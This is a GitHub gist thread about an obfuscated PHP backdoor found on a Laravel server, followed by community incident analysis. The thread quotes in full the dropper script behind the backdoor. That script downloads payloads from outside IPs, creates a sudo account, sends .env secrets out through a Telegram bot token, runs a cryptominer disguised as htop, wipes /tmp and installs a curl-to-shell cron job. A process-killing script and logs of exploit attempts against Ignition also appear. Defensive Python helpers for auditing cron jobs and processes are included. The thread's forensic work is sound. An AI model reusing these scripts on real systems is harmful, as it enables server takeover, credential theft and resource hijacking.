@mp035
Last active March 8, 2023 14:55
A suspected malicious file found on a php server (throw line added to prevent accidental execution).
<?php throw new \Exception("This file is likely a malicious file! Do not run it unless you know what you are doing!"); ?>
<?php $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}
.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}
.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O("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"));?>
@wize-wiz

wize-wiz commented Mar 2, 2023

The link supplied https://ms.neoogilvy.com/vElB0y/song is the actual magic. After a kickstart, it tries to get the content of old.txt on some server that returns a 404.

-- Update: indeed, the vendor/old.txt could actually be the file in the gist.

// old.txt
wget --no-check-certificate http://128.199.245.85/vendor/old.txt -O ./servers.php
--2023-03-02 11:52:05--  http://128.199.245.85/vendor/old.txt
Connecting to 128.199.245.85:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-02 11:52:06 ERROR 404: Not Found.

Same goes for the gc (general compiler? Pff who knows).

// gc
curl --insecure https://64.225.3.91/gc -o gc.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:--  0:00:20 --:--:--     0

The curl --insecure https://ms.neoogilvy.com/get/1e7V5c/hhh.txt is some binary; I guess it is just a disguise to be run as htop, but it isn't htop, so in a ps -ef list you wouldn't find it suspicious if htop is running, which it actually is, but anyways.

So it's just guessing what it actually does, but I do think we can say for certain it is something you do not want on your server ;)

-- Update
On the other hand, I just read yescryptR32 in the file called htop. yescryptR32 is basically a crypto algorithm to mine digital coins; you can read all about it here

The content of https://ms.neoogilvy.com/vElB0y/song.

#!/bin/sh
curl --insecure http://128.199.245.85/vendor/old.txt -o ./servers.php || wget --no-check-certificate http://128.199.245.85/vendor/old.txt -O ./servers.php
curl --insecure http://128.199.245.85/vendor/old.txt -o ./storage/servers.php || wget --no-check-certificate http://128.199.245.85/vendor/old.txt -O ./storage/servers.php
curl --insecure http://128.199.245.85/vendor/old.txt -o ../storage/servers.php || wget --no-check-certificate http://128.199.245.85/vendor/old.txt -O ../storage/servers.php
cd /tmp; curl --insecure https://64.225.3.91/gc -o gc; chmod +x ./gc; ./gc 'useradd brengoz; echo "brengoz:0day.today" | chpasswd; adduser brengoz sudo'
ls -la
getip=$(curl -s monip.org | perl -ne '/IP : ([0-9.]+)/ && print $1')
reverse=$(curl -s --insecure https://api.hackertarget.com/reverseiplookup/?q=$getip > /tmp/reversed.txt)
search=$(find / -name *.env | grep -v 'Permission denied' > /tmp/anu.txt; sed 's/^/cat /;' /tmp/anu.txt > /tmp/gas.sh; chmod +x /tmp/gas.sh; bash /tmp/gas.sh > /tmp/$getip.txt)
MESSAGE=$(cat /tmp/$getip.txt)
rev=$(cat /tmp/reversed.txt)
curl -s -X GET "https://api.telegram.org/bot5144143965:AAHwb1iG6PaEqhPC917-YmMeN_Pur6EXy4Y/sendMessage" -H "application/x-www-form-urlencoded" -d chat_id="-618602250" -d text=""$'\r\n'" $getip "$'\r\n'" $MESSAGE   $rev "
curl -s -F "chat_id=-618602250" -F document=@/tmp/$getip.txt -F text="$MESSAGE" https://api.telegram.org/bot5144143965:AAHwb1iG6PaEqhPC917-YmMeN_Pur6EXy4Y/sendDocument
ulimit -n 65535
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
setenforce 0 2>/dev/null
sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
curl --insecure https://ms.neoogilvy.com/get/1e7V5c/hhh.txt -o /tmp/htop || wget --no-check-certificate https://ms.neoogilvy.com/get/1e7V5c/hhh.txt -O /tmp/htop
cd /tmp
chmod 777 /tmp/htop
core=$(grep -c processor /proc/cpuinfo)
./htop -a yescryptR32 -o 198.50.168.213:6343 -u D86wNspd8ZxnLdswdWN9XHwkbNvqw2aP1i -p c=DGB --cpu-affinity 0x3 --cpu-priority 5 -t $core --background >/dev/null &
sleep 1
rm -rf /tmp/log-rotate
rm -rf /tmp/kill.sh
rm -rf /tmp/*
rm -rf /var/tmp/*
rm -rf /tmp/proc
rm /tmp/*
rm /var/tmp/*
echo "* * * * * curl --insecure http://192.81.212.131/k | sh" > /tmp/cry
crontab /tmp/cry
rm /tmp/cry
echo "runing....."

@wize-wiz

wize-wiz commented Mar 2, 2023

So what you seriously need to do is check if you have a user called brengoz; its password is brengoz:0day.today. Also remove this user completely from every sudo list, and check if other unknown users have been created.

Secondly, a file called servers.php. Looking at how they wrote this bash script, they weren't geniuses; this is seriously amateur work.

@mp035
Author

mp035 commented Mar 2, 2023

@wize-wiz I really appreciate you looking at this. When I tried to unwrap it, I must have misread something, because I didn't get as far as you.

I do not have a user called brengoz, the web app user does not have sufficient privileges to create a new user. The file "servers.php" is actually the one in this gist (minus the safety Exception). I would really like to work out how they are getting it on the server. I removed it and it was uploaded again a few days later, so there is a hole somewhere.

@mp035
Author

mp035 commented Mar 2, 2023

To be clear, the file in this gist is [app]/storage/servers.php. The [app]/ folder is not writeable by the web app user, so nothing has appeared there.

@wize-wiz

wize-wiz commented Mar 2, 2023

@mp035

  • What Laravel version are you using?
  • What Linux distro?
  • Apache or Nginx?
  • Is it a hardened PHP version? Are functions like eval, shell_exec etc. blocked?

Either it is being re-uploaded using the same exploit, OR a script running as a cronjob writes that file back if it gets deleted.

The parts we can see indeed run a cronjob every minute using crontab /tmp/cry, at the line echo "* * * * * curl --insecure http://192.81.212.131/k | sh" > /tmp/cry at the bottom, where the content of http://192.81.212.131/k is:

#!/bin/bash
ps aux | grep -v grep | grep 'tmp' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'var' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'wget' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'zergpool.com' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'pool' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'stratum' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'mysqld' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'systemd' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'php-' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'rplant' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'monero' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'bash' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'miner' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'htop' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'top' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'sshd' | awk '{print $2}' | xargs -i kill -9 {}
kill $(pgrep log-rotate)
kill $(pgrep kdevtmp)
kill $(pgrep kinsing)
rm /tmp/*
rm -rf /tmp/*

Where ps aux | grep -v grep | grep 'sshd' | awk '{print $2}' is simply a trick to get the process id, and xargs -i kill -9 {} kills that process. I have absolutely no clue why this is being run every minute and why killing these processes is so significant.

So what I would do if I were you:

  • Check all crons created by all users, literally all.
  • Scan the logs for access info on the creation date of that particular file servers.php.
  • Deny access for curl and wget for all users.
  • If nothing comes out of the log files, add a watcher on the directory where the servers.php file is created. There are several approaches here, and there is a lot of info to be found on this topic about how to produce stack traces for the processes responsible for writing a particular file.
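The first item in that list, "check all crons created by all users", is worth automating, because the entry this campaign installs is easy to miss among legitimate jobs. The script below is an added example written for this thread, not code from the gist or from either commenter: it parses per-user crontab text, and flags entries that use a download tool, pipe fetched content into a shell, touch a temp directory, or run every minute (the four traits of the `* * * * * curl --insecure http://192.81.212.131/k | sh` line discussed above). The sample crontabs are constructed for the example; only the `192.81.212.131` entry is modelled on the real one. `collect_crontabs()` is the live collector (needs root) and is an assumption about how you would gather the input on a host.

```python
import pwd
import re
import subprocess

# Constructed sample: what `crontab -l -u USER` might return for three accounts.
# The "app" entry mirrors the one installed by the script in this thread; the
# other entries are made up to show that ordinary jobs are not flagged.
SAMPLE_CRONTABS = {
    "root": "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n",
    "app": (
        "# m h dom mon dow command\n"
        "* * * * * curl --insecure http://192.81.212.131/k | sh\n"
        "0 2 * * * php /var/www/app/artisan schedule:run\n"
    ),
    "deploy": "*/5 * * * * wget -qO- http://198.51.100.7/update.sh | bash\n",
}

# The downloaders the gist author ended up disabling, plus the shells a fetched
# payload is usually piped into, plus the temp locations this campaign lives in.
DOWNLOADERS = re.compile(r"\b(curl|wget|GET|lwp-download|lwp-mirror|lwp-request)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
TEMP_PATH = re.compile(r"/(var/)?tmp/|/dev/shm/")


def parse_crontab(text):
    """Yield (schedule, command) pairs from per-user crontab text.

    Comments, blank lines and VAR=value lines are skipped. Note: /etc/crontab and
    /etc/cron.d/* carry an extra user column after the schedule; they need a
    6-field split before the command and are not handled here.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        yield " ".join(fields[:5]), fields[5]


def score_entry(schedule, command):
    """Return the list of reasons an entry deserves a look (empty list = looks normal)."""
    reasons = []
    if DOWNLOADERS.search(command):
        reasons.append("uses a network download tool")
    if PIPE_TO_SHELL.search(command):
        reasons.append("pipes fetched content into a shell")
    if TEMP_PATH.search(command):
        reasons.append("runs from or writes to a temp directory")
    if schedule == "* * * * *":
        reasons.append("runs every minute")
    return reasons


def audit_crontabs(crontabs):
    """crontabs: {user: crontab_text}. Returns one finding per suspicious entry."""
    findings = []
    for user, text in crontabs.items():
        for schedule, command in parse_crontab(text):
            reasons = score_entry(schedule, command)
            if reasons:
                findings.append({"user": user, "schedule": schedule,
                                 "command": command, "reasons": reasons})
    return findings


def collect_crontabs():
    """Live collection (run as root): `crontab -l -u USER` for every /etc/passwd account.
    Assumed to be the collector you would pair with audit_crontabs on a real host."""
    result = {}
    for entry in pwd.getpwall():
        proc = subprocess.run(["crontab", "-l", "-u", entry.pw_name],
                              capture_output=True, text=True)
        if proc.returncode == 0 and proc.stdout.strip():
            result[entry.pw_name] = proc.stdout
    return result


if __name__ == "__main__":
    for finding in audit_crontabs(SAMPLE_CRONTABS):
        print(f"[{finding['user']}] {finding['schedule']} {finding['command']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

On the sample, the `app` entry is reported with all four reasons and the `deploy` entry with two; the logrotate and artisan jobs are silent. Once the per-user crontabs are clean, look at /etc/crontab, /etc/cron.d and the cron.hourly/daily directories as well, since the list above only covers what `crontab -l` shows.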

@mp035
Author

mp035 commented Mar 2, 2023

There was a cron job for the [app] user:

I have disabled "curl" "GET" "lwp-download" "lwp-mirror" "lwp-request" and "wget" for all users.

I will check the logs tomorrow and try to work out how it originally got on the server.

Thank you. I am in your debt.

@wize-wiz

wize-wiz commented Mar 3, 2023

Yea that's more like it ;) Who was the user assigned to that job?

Now it's literally back-tracing all steps, good luck and if you find something interesting, let me know :D

Cheers

@mp035
Author

mp035 commented Mar 3, 2023

Still haven't checked the logs, but I just wanted to share that there were 9 instances of a process still running:

[app user] 363006 0.0 0.6 230948 13408 ? Ssl Feb16 1:50 ./htop -a yescryptR16 -o 198.50.168.213:6333 -u qpkg4fgnh8a0hhzd2z9g80g4d09j6qnt0sth6l8x7z -p x --cpu-affinity 0x3 --cpu-priority 5 --background

It just occurred to me to check, seeing as you identified that the process was masquerading as htop.
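The process line above shows why a name check alone is not enough: the binary is called `htop`, but it was launched as `./htop` from /tmp, it carries miner-style arguments (`-a <algo> -o host:port -u <wallet>`), and the script that started it deletes /tmp afterwards. The following is an added example, not from the gist or the commenters, that triages `ps aux` output on exactly those signals. The sample output is constructed; the second line is modelled on the process the author found, with the account renamed to `app`. `exe_path()` is the live check (reads /proc) and is an assumption about how you would confirm a finding on the host.

```python
import os
import re
import subprocess

# Constructed `ps aux` sample. Line 2 is modelled on the process reported in the
# thread (user renamed to "app"); the others are ordinary processes for contrast.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 168532 11256 ?        Ss   Feb16   0:12 /sbin/init
app     363006  0.0  0.6 230948 13408 ?        Ssl  Feb16   1:50 ./htop -a yescryptR16 -o 198.50.168.213:6333 -u qpkg4fgnh8a0hhzd2z9g80g4d09j6qnt0sth6l8x7z -p x --cpu-affinity 0x3 --cpu-priority 5 --background
www-data  4021  0.3  1.2 315020 25440 ?        S    10:02   0:03 php-fpm: pool www
admin     5120  0.0  0.2  22104  3852 pts/0    S+   10:05   0:00 htop
"""

# Binary started from the working directory or a temp location.
TEMP_EXEC = re.compile(r"^(\./|/tmp/|/var/tmp/|/dev/shm/)")
# The argument shape seen in this thread: -a <algorithm> ... -o <host:port> ... -u <wallet>.
MINER_ARGS = re.compile(r"(^|\s)-a\s+\S+.*\s-o\s+[\w.\-]+:\d+.*\s-u\s+\S+")
# Tool names a miner is likely to borrow so that it blends into a process list.
IMPERSONATED = {"htop", "top", "kworker", "kthreadd", "sshd", "cron"}


def parse_ps_aux(text):
    """Parse `ps aux` output into dicts; the COMMAND column keeps its spaces."""
    procs = []
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 10)
        if len(fields) < 11:
            continue
        procs.append({"user": fields[0], "pid": int(fields[1]),
                      "cpu": float(fields[2]), "start": fields[8], "cmd": fields[10]})
    return procs


def suspicious_reasons(proc):
    """Reasons a process deserves a look; empty list means nothing matched."""
    cmd = proc["cmd"]
    argv0 = cmd.split()[0]
    name = os.path.basename(argv0)
    reasons = []
    if TEMP_EXEC.match(argv0):
        reasons.append("launched from a relative or temp path")
    if MINER_ARGS.search(cmd):
        reasons.append("miner-style arguments (-a algo -o host:port -u wallet)")
        if name in IMPERSONATED:
            reasons.append(f"named like the system tool '{name}'")
    return reasons


def triage(procs):
    """Return only the processes that have at least one reason, with the reasons attached."""
    return [dict(proc, reasons=r) for proc in procs if (r := suspicious_reasons(proc))]


def exe_path(pid):
    """Live check: the on-disk binary behind a PID. A ' (deleted)' suffix means the
    file was removed after launch, which is what `rm -rf /tmp/*` in the script above
    would leave behind for the running miner."""
    try:
        return os.readlink(f"/proc/{pid}/exe")
    except OSError:
        return None


def live_ps_aux():
    """Live collection on the host; pair with triage() instead of SAMPLE_PS."""
    return subprocess.run(["ps", "aux"], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for proc in triage(parse_ps_aux(SAMPLE_PS)):
        print(f"pid {proc['pid']} ({proc['user']}, started {proc['start']}): {proc['cmd'][:60]}...")
        for reason in proc["reasons"]:
            print(f"    - {reason}")
```

On the sample only pid 363006 is reported, with all three reasons; the real `htop` run by `admin` is untouched. The `start` column matters during the clean-up: a process that started on Feb16 but whose binary no longer exists on disk is a good candidate for the "9 instances" situation described above.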

@wize-wiz

wize-wiz commented Mar 3, 2023

Yea, it just occurred to me that you could scan the logs quicker by checking for the GET parameters 000 and 0x0 located in the script. These seem to be used to activate the script.

@mp035
Author

mp035 commented Mar 6, 2023

It seems the successful execution of servers.php came from a python-requests script, so I went through and isolated all the entries from python-requests:

see below, on 01/Mar/2023:18:15:12:

34.77.127.183 - - [18/Feb/2023:06:11:57 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
34.172.30.85 - - [18/Feb/2023:09:27:13 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
185.224.128.219 - - [18/Feb/2023:15:19:55 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [18/Feb/2023:15:27:50 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [18/Feb/2023:15:40:04 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
20.110.249.240 - - [18/Feb/2023:15:54:43 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
18.208.159.107 - - [18/Feb/2023:17:56:41 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.1"
130.211.54.158 - - [18/Feb/2023:22:10:27 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
185.224.128.219 - - [18/Feb/2023:22:16:41 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [18/Feb/2023:22:32:32 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [18/Feb/2023:23:13:43 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
34.140.248.32 - - [19/Feb/2023:06:28:14 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
185.224.128.219 - - [19/Feb/2023:09:00:25 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [19/Feb/2023:09:16:32 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
34.76.158.233 - - [19/Feb/2023:09:23:30 +0000] "GET / HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
185.224.128.219 - - [19/Feb/2023:09:32:24 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
142.147.89.235 - - [19/Feb/2023:11:55:59 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
20.241.59.67 - - [19/Feb/2023:16:22:57 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
185.224.128.219 - - [19/Feb/2023:19:04:28 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
20.251.12.114 - - [19/Feb/2023:19:11:13 +0000] "GET /.env HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
185.224.128.219 - - [19/Feb/2023:19:21:09 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [19/Feb/2023:19:38:25 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
115.64.229.34 - - [19/Feb/2023:20:36:10 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.18.4"
115.64.229.34 - - [19/Feb/2023:20:36:11 +0000] "GET /core/.env HTTP/1.1" 404 134 "-" "python-requests/2.18.4"
34.76.158.233 - - [19/Feb/2023:21:44:27 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
115.64.229.34 - - [19/Feb/2023:22:18:54 +0000] "GET /.env HTTP/1.1" 404 2316 "-" "python-requests/2.18.4"
115.64.229.34 - - [19/Feb/2023:22:18:56 +0000] "GET /core/.env HTTP/1.1" 404 2316 "-" "python-requests/2.18.4"
20.251.12.114 - - [20/Feb/2023:01:27:00 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.77.127.183 - - [20/Feb/2023:06:23:43 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
185.224.128.219 - - [20/Feb/2023:08:01:53 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [20/Feb/2023:08:09:22 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [20/Feb/2023:08:17:56 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580906 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 614348 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580968 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 198267 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /servers.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /storage/servers.php HTTP/1.1" 200 58 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /asu.php?0day=52.37.113.80/lottery/in HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /suw.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /id.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /fuyuh.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /canary.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
128.199.209.214 - - [20/Feb/2023:09:57:41 +0000] "GET /can.php HTTP/1.1" 404 622 "-" "python-requests/2.18.4"
20.221.197.72 - - [20/Feb/2023:12:58:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.78.6.216 - - [20/Feb/2023:21:57:11 +0000] "GET / HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
34.140.248.32 - - [21/Feb/2023:06:21:02 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
20.251.12.114 - - [21/Feb/2023:07:59:18 +0000] "GET /.env HTTP/1.1" 400 264 "-" "python-requests/2.28.2"
115.64.229.34 - - [21/Feb/2023:08:58:08 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.18.4"
115.64.229.34 - - [21/Feb/2023:08:58:13 +0000] "GET /core/.env HTTP/1.1" 404 134 "-" "python-requests/2.18.4"
115.64.229.34 - - [21/Feb/2023:10:43:42 +0000] "GET /.env HTTP/1.1" 404 2316 "-" "python-requests/2.18.4"
115.64.229.34 - - [21/Feb/2023:10:43:45 +0000] "GET /core/.env HTTP/1.1" 404 2316 "-" "python-requests/2.18.4"
51.38.47.58 - - [21/Feb/2023:10:53:50 +0000] "GET / HTTP/1.1" 200 917 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:52 +0000] "POST / HTTP/1.1" 405 556913 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:55 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580603 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:57 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580657 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:58 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:58 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:58 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 594804 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:59 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580969 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:53:59 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:54:00 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 579451 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:54:00 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:09 +0000] "GET / HTTP/1.1" 200 917 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:11 +0000] "POST / HTTP/1.1" 405 556913 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:14 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580603 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:16 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580657 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:18 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 595186 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:18 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 580969 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:18 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:26 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 579469 "-" "python-requests/2.28.2"
51.38.47.58 - - [21/Feb/2023:10:58:28 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.28.2"
20.251.12.114 - - [21/Feb/2023:16:17:09 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
34.78.6.216 - - [21/Feb/2023:21:15:35 +0000] "GET / HTTP/1.1" 200 396 "-" "python-requests/2.28.2"
20.251.12.114 - - [21/Feb/2023:22:18:12 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.28.2"
35.233.62.116 - - [22/Feb/2023:06:16:06 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.28.2"
20.225.133.97 - - [22/Feb/2023:06:51:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 178 "-" "python-requests/2.28.2"
20.225.133.97 - - [22/Feb/2023:06:51:53 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2316 "-" "python-requests/2.28.2"
185.224.128.219 - - [22/Feb/2023:07:08:38 +0000] "GET /_asterisk/ HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
185.224.128.219 - - [22/Feb/2023:07:36:02 +0000] "GET /freepbx/recordings/theme/main.css HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
185.224.128.219 - - [22/Feb/2023:07:44:21 +0000] "GET / HTTP/1.1" 200 234 "-" "python-requests/2.22.0"
188.166.187.191 - - [22/Feb/2023:09:12:18 +0000] "GET /api/v1 HTTP/1.1" 400 264 "-" "python-requests/2.22.0"
188.166.187.191 - - [22/Feb/2023:09:12:19 +0000] "GET /api/v1 HTTP/1.1" 404 134 "-" "python-requests/2.22.0"
20.127.205.182 - - [22/Feb/2023:11:37:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 134 "-" "python-requests/2.26.0"
185.225.74.39 - - [22/Feb/2023:12:10:44 +0000] "GET /.git/config HTTP/1.1" 404 134 "-" "python-requests/2.28.1"
147.182.206.223 - - [22/Feb/2023:19:00:44 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
147.182.206.223 - - [22/Feb/2023:19:00:44 +0000] "GET /.env HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
147.182.206.223 - - [22/Feb/2023:19:00:45 +0000] "GET /core/.env HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
147.182.206.223 - - [22/Feb/2023:19:00:47 +0000] "GET /core/.env HTTP/1.1" 404 134 "-" "python-requests/2.27.1"
